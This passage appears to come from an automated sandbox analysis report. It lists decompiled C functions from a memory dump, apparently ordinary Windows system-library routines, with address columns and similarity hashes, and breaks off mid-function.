                                                          0x034cc491
                                                          0x034cc493
                                                          0x034cc493
                                                          0x034cc48f
                                                          0x034cc498
                                                          0x034cc49e
                                                          0x034cc4ad
                                                          0x034cc4ad
                                                          0x034cc4b2
                                                          0x034cc4b4
                                                          0x034cc4cd

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                          • Instruction ID: 5ba2ed44737de315c166be2ade92418cfbb2b0ef6268eb90c9bd76ee86a9bd9f
                                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                          • Instruction Fuzzy Hash: CF01847A140645BFD611EF66CC80EA3FB7DFB54390F14852AF1144E660C721ACA1CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03439080, Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E03439080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x35285ec;
				E03452280(_t48, 0x35285ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0344FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x352538c; // 0x771c6888
					if( *_t84 != 0x3525388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x350f6e8);
						E0348D0E8(0x35285ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E035088F5(_t80, _t85, 0x3525388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x35286c0; // 0x2fd07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x35286b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03452280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E035088F5(0x35285ec, _t85, 0x3525388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0347AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x352b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x35284c0;
																			if(_t82 >=  *0x35284c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03509063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0343922A(_t99);
										_t64 = E03457D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03508B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x35286c0; // 0x2fd07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x35286b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x35286bc;
													_t87 = 0x35286b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03439240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x35286c4;
												_t87 = 0x35286c0;
												L27:
												E03469B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0348D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3525388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x352538c = _t51;
						goto L6;
					}
				}
			}




















                                                          0x03439082
                                                          0x03439083
                                                          0x03439084
                                                          0x03439085
                                                          0x03439087
                                                          0x03439096
                                                          0x03439098
                                                          0x03439098
                                                          0x0343909e
                                                          0x034390a8
                                                          0x034390e7
                                                          0x034390e7
                                                          0x034390aa
                                                          0x034390b0
                                                          0x034390b7
                                                          0x034390bd
                                                          0x034390dd
                                                          0x034390e6
                                                          0x034390bf
                                                          0x034390bf
                                                          0x034390c7
                                                          0x034390cf
                                                          0x034390f1
                                                          0x034390f2
                                                          0x034390f4
                                                          0x034390f5
                                                          0x034390f6
                                                          0x034390f7
                                                          0x034390f8
                                                          0x034390f9
                                                          0x034390fa
                                                          0x034390fb
                                                          0x034390fc
                                                          0x034390fd
                                                          0x034390fe
                                                          0x034390ff
                                                          0x03439100
                                                          0x03439102
                                                          0x03439107
                                                          0x0343910c
                                                          0x03439110
                                                          0x03439113
                                                          0x03439115
                                                          0x03439136
                                                          0x0343913f
                                                          0x03439143
                                                          0x034937e4
                                                          0x034937e4
                                                          0x03439117
                                                          0x03439117
                                                          0x0343911d
                                                          0x00000000
                                                          0x0343911f
                                                          0x0343911f
                                                          0x03439125
                                                          0x00000000
                                                          0x03439127
                                                          0x0343912d
                                                          0x03439130
                                                          0x03439134
                                                          0x03439158
                                                          0x0343915d
                                                          0x03439161
                                                          0x03439168
                                                          0x03493715
                                                          0x0343916e
                                                          0x0343916e
                                                          0x03439175
                                                          0x03439177
                                                          0x0343917e
                                                          0x0343917f
                                                          0x03439182
                                                          0x03439182
                                                          0x03439187
                                                          0x03439187
                                                          0x0343918a
                                                          0x0343918d
                                                          0x0343918f
                                                          0x03439192
                                                          0x03439195
                                                          0x03439198
                                                          0x03439198
                                                          0x03439198
                                                          0x0343919a
                                                          0x00000000
                                                          0x00000000
                                                          0x0349371f
                                                          0x03493721
                                                          0x03493727
                                                          0x0349372f
                                                          0x03493733
                                                          0x03493735
                                                          0x03493738
                                                          0x0349373b
                                                          0x0349373d
                                                          0x03493740
                                                          0x00000000
                                                          0x03493746
                                                          0x03493746
                                                          0x03493749
                                                          0x00000000
                                                          0x0349374f
                                                          0x0349374f
                                                          0x03493751
                                                          0x03493757
                                                          0x03493759
                                                          0x0349375c
                                                          0x0349375c
                                                          0x0349375e
                                                          0x0349375e
                                                          0x03493761
                                                          0x03493764
                                                          0x00000000
                                                          0x00000000
                                                          0x03493766
                                                          0x03493768
                                                          0x034937a3
                                                          0x034937a3
                                                          0x034937a5
                                                          0x034937a7
                                                          0x034937ad
                                                          0x034937b0
                                                          0x034937b2
                                                          0x034937bc
                                                          0x034937c2
                                                          0x034937c2
                                                          0x034937b2
                                                          0x03439187
                                                          0x03439187
                                                          0x0343918a
                                                          0x0343918d
                                                          0x0343918f
                                                          0x03439192
                                                          0x03439195
                                                          0x00000000
                                                          0x03439195
                                                          0x00000000
                                                          0x0349376a
                                                          0x0349376a
                                                          0x0349376a
                                                          0x0349376c
                                                          0x0349376c
                                                          0x0349376f
                                                          0x03493775
                                                          0x00000000
                                                          0x00000000
                                                          0x03493777
                                                          0x03493779
                                                          0x03493782
                                                          0x03493787
                                                          0x03493789
                                                          0x03493790
                                                          0x03493790
                                                          0x0349378b
                                                          0x0349378b
                                                          0x0349378b
                                                          0x03493792
                                                          0x03493795
                                                          0x00000000
                                                          0x03493795
                                                          0x00000000
                                                          0x03493779
                                                          0x03493798
                                                          0x00000000
                                                          0x03493798
                                                          0x00000000
                                                          0x03493768
                                                          0x0349379b
                                                          0x0349379b
                                                          0x03493751
                                                          0x03493749
                                                          0x00000000
                                                          0x03493740
                                                          0x034391a0
                                                          0x034391a3
                                                          0x034391a9
                                                          0x034391b0
                                                          0x00000000
                                                          0x034391b0
                                                          0x03439187
                                                          0x034391b4
                                                          0x034391b4
                                                          0x034391bb
                                                          0x034391c0
                                                          0x034391c5
                                                          0x034391c7
                                                          0x034937da
                                                          0x034391cd
                                                          0x034391cd
                                                          0x034391cd
                                                          0x034391d2
                                                          0x034391d5
                                                          0x03439239
                                                          0x03439239
                                                          0x034391d7
                                                          0x034391db
                                                          0x034391e1
                                                          0x034391e7
                                                          0x034391fd
                                                          0x03439203
                                                          0x0343921e
                                                          0x03439223
                                                          0x00000000
                                                          0x03439205
                                                          0x03439205
                                                          0x03439208
                                                          0x0343920c
                                                          0x03439214
                                                          0x03439214
                                                          0x0343920c
                                                          0x034391e9
                                                          0x034391e9
                                                          0x034391ee
                                                          0x034391f3
                                                          0x034391f3
                                                          0x034391f3
                                                          0x034391e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03439134
                                                          0x03439125
                                                          0x0343911d
                                                          0x0343914e
                                                          0x034390d1
                                                          0x034390d1
                                                          0x034390d3
                                                          0x034390d6
                                                          0x034390d8
                                                          0x00000000
                                                          0x034390d8
                                                          0x034390cf

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f1062643f05329aa3cbd5aa8f09e7b837f8e58642c26fb84d436d3ffda36028
                                                          • Instruction ID: 1a99e38326cabf846fd890395c80e00b74d11acf3265e5770204e9889233f17a
                                                          • Opcode Fuzzy Hash: 0f1062643f05329aa3cbd5aa8f09e7b837f8e58642c26fb84d436d3ffda36028
                                                          • Instruction Fuzzy Hash: C001A972A016048FD325DF08D840B12BBB9EB8B320F29446BE501CF7A1D3B09C42CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03504015, Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E03504015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03452280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03452280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x35286ac);
					E0343F900(0x35286d4, _t28);
					E0344FFB0(0x35286ac, _t28, 0x35286ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0344FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                          0x0350401a
                                                          0x0350401e
                                                          0x03504023
                                                          0x03504028
                                                          0x03504029
                                                          0x0350402b
                                                          0x0350402f
                                                          0x03504043
                                                          0x03504046
                                                          0x03504051
                                                          0x03504057
                                                          0x0350405f
                                                          0x03504062
                                                          0x03504067
                                                          0x0350406f
                                                          0x0350407c
                                                          0x0350407c
                                                          0x0350408c
                                                          0x0350408c
                                                          0x03504097

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1c5c176e5dfeca18c1878e70ba892bdc1a0487055607039b37b34a32bee8248
                                                          • Instruction ID: 49d37074cf3b497b8ca5b40422939f6b3c39d20560b95f196975046b1014a91d
                                                          • Opcode Fuzzy Hash: d1c5c176e5dfeca18c1878e70ba892bdc1a0487055607039b37b34a32bee8248
                                                          • Instruction Fuzzy Hash: 330184756017497FD211EB6ADD80E17BBACFF45650B00022BF9088FA62CB24EC11CAE8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034F138A, Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E034F138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x352d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0347FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03457D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0347B640(E03479AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                          0x034f138a
                                                          0x034f138a
                                                          0x034f1399
                                                          0x034f13a3
                                                          0x034f13a8
                                                          0x034f13aa
                                                          0x034f13b5
                                                          0x034f13bb
                                                          0x034f13c3
                                                          0x034f13c6
                                                          0x034f13c9
                                                          0x034f13d4
                                                          0x034f13e6
                                                          0x034f13d6
                                                          0x034f13df
                                                          0x034f13df
                                                          0x034f13f1
                                                          0x034f13f2
                                                          0x034f13f4
                                                          0x034f13f9
                                                          0x034f140e

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6ebe14c4a8078f9e528ce6585a214c0806781d3f50965d9cccdcd23f69b5001
                                                          • Instruction ID: b1c5131f57477e811d0ecf17de9bb52c67b4dd80dc58706039b8fcf022c6bb14
                                                          • Opcode Fuzzy Hash: e6ebe14c4a8078f9e528ce6585a214c0806781d3f50965d9cccdcd23f69b5001
                                                          • Instruction Fuzzy Hash: 7A015275A01358AFDB14EFA9D881EAEBBB8EF44710F04406BB914EF380D6749A05C799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034F14FB, Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E034F14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x352d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0347FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03457D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0347B640(E03479AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                          0x034f14fb
                                                          0x034f14fb
                                                          0x034f150a
                                                          0x034f1514
                                                          0x034f1519
                                                          0x034f151b
                                                          0x034f1526
                                                          0x034f152c
                                                          0x034f1534
                                                          0x034f1537
                                                          0x034f153a
                                                          0x034f1545
                                                          0x034f1557
                                                          0x034f1547
                                                          0x034f1550
                                                          0x034f1550
                                                          0x034f1562
                                                          0x034f1563
                                                          0x034f1565
                                                          0x034f156a
                                                          0x034f157f

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c7af766a18cde2edab41706b4a628ab102d2f3d2e7ef51b7d6414cf10a58835
                                                          • Instruction ID: 3a7a8e69276013cb601d25ebd41d3dd46c9d4fd232dfffa90d5034717fada289
                                                          • Opcode Fuzzy Hash: 6c7af766a18cde2edab41706b4a628ab102d2f3d2e7ef51b7d6414cf10a58835
                                                          • Instruction Fuzzy Hash: 17018075A01248AFCB10EF69D841EAEBBB8EF44700F04406BB915EF380D670DA05CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034358EC, Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 91%
                                                          			E034358EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x352d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x3415c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03435943() != 0 &&  *0x3525320 > 5) {
					E034B7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E034B7B5E( &_v28, _t28);
					_t11 = E034B7B9C(0x3525320, 0x341bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0347B640(_t11, _t17, _v8 ^ _t29, 0x341bf15, _t27, _t28);
			}















                                                          0x034358fb
                                                          0x034358fe
                                                          0x03435906
                                                          0x0343590a
                                                          0x0343593c
                                                          0x0343593c
                                                          0x0343590c
                                                          0x0343590c
                                                          0x03435911
                                                          0x00000000
                                                          0x03435913
                                                          0x03435913
                                                          0x03435913
                                                          0x03435911
                                                          0x0343591d
                                                          0x03491035
                                                          0x0349103c
                                                          0x0349103f
                                                          0x03491056
                                                          0x03491056
                                                          0x0343593b

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d7900ac1577df24765c6fa591d2a77fd49ce4580a8dcb8242bd8a54c6a2acb0
                                                          • Instruction ID: 0485c0878ed650f5aee39e2cb5f5f7d0f88945a3d504c21c47ee1b4717d40ff8
                                                          • Opcode Fuzzy Hash: 4d7900ac1577df24765c6fa591d2a77fd49ce4580a8dcb8242bd8a54c6a2acb0
                                                          • Instruction Fuzzy Hash: 100188357006089FC714EE65D8109AFB7B8EF8B120B9900AB98159F254DF31DD068A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034EFE3F, Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E034EFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x352d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0347FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03457D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0347B640(E03479AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                          0x034efe3f
                                                          0x034efe3f
                                                          0x034efe4e
                                                          0x034efe58
                                                          0x034efe5d
                                                          0x034efe5f
                                                          0x034efe6a
                                                          0x034efe72
                                                          0x034efe75
                                                          0x034efe78
                                                          0x034efe83
                                                          0x034efe95
                                                          0x034efe85
                                                          0x034efe8e
                                                          0x034efe8e
                                                          0x034efea0
                                                          0x034efea1
                                                          0x034efea3
                                                          0x034efea8
                                                          0x034efebd

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8ca9c1d0582293d737229aef32fe97e831468e31852371680ee9c6087d6c0522
                                                          • Instruction ID: b3154d0d2770a255c08f71c99708bfc22d8b4dd00b63997bb6c16f8eecc2bb20
                                                          • Opcode Fuzzy Hash: 8ca9c1d0582293d737229aef32fe97e831468e31852371680ee9c6087d6c0522
                                                          • Instruction Fuzzy Hash: 17018475E01348AFCB14EFA9D845FAEBBB8EF44700F00406BB900AF391DA709A05C799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034EFEC0, Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E034EFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x352d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0347FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03457D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0347B640(E03479AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                          0x034efec0
                                                          0x034efec0
                                                          0x034efecf
                                                          0x034efed9
                                                          0x034efede
                                                          0x034efee0
                                                          0x034efeeb
                                                          0x034efef3
                                                          0x034efef6
                                                          0x034efef9
                                                          0x034eff04
                                                          0x034eff16
                                                          0x034eff06
                                                          0x034eff0f
                                                          0x034eff0f
                                                          0x034eff21
                                                          0x034eff22
                                                          0x034eff24
                                                          0x034eff29
                                                          0x034eff3e

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e78870abf35b7a3e90afa7fef247b3e0f1728cf58b28f7b0ce286a800621f15b
                                                          • Instruction ID: 92a0a0423882630ca6287759ab830976c1459c7b194f1d40d2c75b325bd37274
                                                          • Opcode Fuzzy Hash: e78870abf35b7a3e90afa7fef247b3e0f1728cf58b28f7b0ce286a800621f15b
                                                          • Instruction Fuzzy Hash: D3017175A01208AFCB14EBA9D845EAEBBB8EB45700F00406BB900AF291DA709A05C799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03501074, Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E03501074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
